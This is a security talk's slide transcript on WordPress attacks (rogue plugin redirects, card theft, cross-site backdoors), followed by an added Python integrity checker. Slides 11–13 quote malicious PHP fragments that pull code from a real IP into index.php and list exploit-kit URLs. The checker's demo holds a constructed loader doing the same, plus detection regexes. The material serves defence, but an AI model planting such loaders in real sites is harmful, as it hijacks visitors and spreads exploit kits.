2. This is me!
Sucuri Inc.
Website Security
o Incident Handling
o Log Analysis
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
3. Let’s Learn from Website Attacks
Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.
5. Attack Scenarios
o The Art of Phishing
o Stealing Credit Cards
11. Intent
o Redirection - porn or exploit kits
o Target: index.php
o Taking content from here:
$code_txt = 'http://91.239.15.61/o1.txt';
o Placing it in the files here:
$index_path = $path.'/index.php';
if(file_put_contents($index_path, $code)){
12. How?
o index.php payload:
o Using curl to pull content from here:
$url = 'http://91.239.15.61/java/google.php';
13. Payload
o Pulls content from:
http://91.239.15.61/google.js - Redirection to Porn Sites
http://91.239.15.61/g.php - Exploit Kits
14. Lesson to Be Learned
o Trust but verify sources
o This is not isolated to just plugins, it can happen to themes as well
o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
o The vulnerability was the website administrator…
16. Got e-Commerce?
o Business owners <3 E-commerce
o CMS extensibility = WooCommerce
o Quick setup of payment collection systems for goods
o Awesome, right?
17. Big Target
o Credit Card = Cha-Ching
o Used/shared/sold underground
o Impact is catastrophic
o Blacklisting
o Ban
o No more cash flow! No more Trust!
18. Cross-contamination
Simple concept in which your website is attacked and infected by a neighboring site in the same environment.
19. vBulletin
o Popular CMS Application for Forums
o WordPress + vBulletin Configurations Common
20. Scenario
o WordPress: Main website | Blog | e-Commerce
o vBulletin: Forum
o 1 Server
25. vBulletin Plugin
o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation.
28. Lessons to be Learned
o Attackers are smart – surprise!!!
o Cross-contamination is a real threat today!
o Must be diligent across our stack!
o Isolate applications if possible.
30. Harsh Reality
None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips.
31. Two Important Vectors
o Access control
o Within your control…
o Software vulnerabilities
o Not so much…
32. Defense in Depth
• There is no single cure
• Layered Defenses
• Combination of tools and actions
– Combine: Protection and Detection
33. Access Control
o Google Authenticator – 2FA
o http://wordpress.org/plugins/google-authenticator/
o Duo Security – 2FA
o http://wordpress.org/plugins/duo-wordpress/
o Login Secure Solutions – Policy / Enforcement
o http://wordpress.org/plugins/login-security-solution/
o Sucuri CloudProxy / Detection / Remediation - Complete Website Security
o http://sucuri.net/signup
34. Software Vulnerabilities
o Trusted Sources
o Start with the repo and established communities
o If you’re not a developer this is going to be mostly beyond your reach
o Web Application Firewall (WAF) Plugins
o Highly ineffective, evading and bypassing is easy
o Cause Denial of Service attacks
o SaaS based Web Application Firewall (WAF) more effective!
o Sucuri CloudProxy WAF
35. Auditing
• Know what is going on with your site
– Integrity Checks
– Logging in / Logging out
– Changes being made
• More important than half the hardening tips you read online today
• Options:
– WP Security Audit Log http://wordpress.org/plugins/wp-security-audit-log/
– Sucuri Premium Plugin http://wordpress.sucuri.net
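The rogue plugin on the Intent, How and Payload slides works by pulling content from a remote host and writing it into index.php, and the Auditing slide names integrity checks as the way to catch changes like that. The following is an added example, not code from the deck or from any Sucuri product: a small Python integrity check that hashes a site tree into a baseline, reports files added or modified since, and flags new or changed PHP files that show the behaviour described on those slides (a remote fetch call, a raw-IP URL, a write to index.php). The regexes are this example's own heuristics, and the plugin directory name free-theme-pack, the PHP snippets and the 203.0.113.10 address are constructed for the demo.

```python
import hashlib
import json
import os
import re
import shutil
import tempfile

# Heuristics for the behaviour described on the Intent/How/Payload slides.
# These are added regexes for this example, not Sucuri signatures.
REMOTE_FETCH = re.compile(r"\b(curl_init|curl_exec|file_get_contents)\s*\(", re.I)
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", re.I)
INDEX_WRITE = re.compile(r"file_put_contents\s*\(\s*\$?\w*index", re.I)


def sha256_of(path):
    """Stream a file through SHA-256 so large uploads are not loaded into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Return {relative path: sha256} for every file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_of(full)
    return manifest


def diff_manifests(baseline, current):
    """Classify every path as added, removed or modified relative to the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def suspicious_indicators(php_source):
    """Names of the heuristics that match a PHP source string, in a fixed order."""
    checks = [
        ("remote_fetch", REMOTE_FETCH),
        ("raw_ip_url", RAW_IP_URL),
        ("writes_index_php", INDEX_WRITE),
    ]
    return [name for name, pattern in checks if pattern.search(php_source)]


def audit(root, baseline):
    """Diff the tree against the baseline and scan every new or changed PHP file."""
    changes = diff_manifests(baseline, build_manifest(root))
    findings = {}
    for rel in changes["added"] + changes["modified"]:
        if not rel.endswith(".php"):
            continue
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            hits = suspicious_indicators(fh.read())
        if hits:
            findings[rel] = hits
    return changes, findings


# --- constructed demo site (not real WordPress or plugin code) ---------------
CLEAN_INDEX = "<?php\n// constructed sample of a stock front controller\nrequire __DIR__ . '/wp-blog-header.php';\n"

# Constructed stand-in for the rogue plugin behaviour the slides describe;
# 203.0.113.10 is a documentation (TEST-NET-3) address, not a real host.
ROGUE_LOADER = (
    "<?php\n"
    "$code = file_get_contents('http://203.0.113.10/o1.txt');\n"
    "$index_path = $path . '/index.php';\n"
    "if (file_put_contents($index_path, $code)) { echo 'done'; }\n"
)

# What index.php looks like after the overwrite: the stock file plus a remote pull.
TAMPERED_INDEX = CLEAN_INDEX + "<?php echo file_get_contents('http://203.0.113.10/google.js');\n"


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Baseline a clean site, drop in the rogue plugin, then audit. Returns (changes, findings)."""
    site = tempfile.mkdtemp(prefix="wp-audit-")
    try:
        _write(os.path.join(site, "index.php"), CLEAN_INDEX)
        baseline = build_manifest(site)  # in practice, persist this with json.dump and keep it off the web root
        _write(os.path.join(site, "wp-content", "plugins", "free-theme-pack", "loader.php"), ROGUE_LOADER)
        _write(os.path.join(site, "index.php"), TAMPERED_INDEX)
        return audit(site, baseline)
    finally:
        shutil.rmtree(site, ignore_errors=True)


if __name__ == "__main__":
    changes, findings = demo()
    print(json.dumps({"changes": changes, "findings": findings}, indent=2))
```

The baseline must be taken from a known-clean install and stored somewhere the web server user cannot write, otherwise an attacker who gets file write (as on the vBulletin slide) simply rewrites the manifest along with index.php. The pattern scan is only a triage aid for the files the hash diff already singled out; the hash diff is the control that does not depend on recognising the payload.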
36. If all else fails…
o Be sure you have backups…
o VaultPress – WordPress Sites
o Sucuri Backups – WordPress and Everything else
o SaaS based Backups more effective!
37. Tony Perez
@perezbox | @sucuri_security
tony@sucuri.net
#wordsesh
Editor's Notes
Defense in depth is a pretty standard phrase used in the security world in which there is no dependency on any one control, but rather a series of controls implemented throughout the stack to ensure integrity and security. It’s simple and effective, yet many don’t apply it for whatever reason. We’re too busy focusing on that quick solution that will end all my problems: that one plugin that will harden my entire site to the point where I won’t be able to access it and none of my plugins will work.
Be sure to check out Jason Cosper’s presentation from earlier this evening; it should be up on WordSesh soon, and he goes through some good tips on hardening your WordPress site.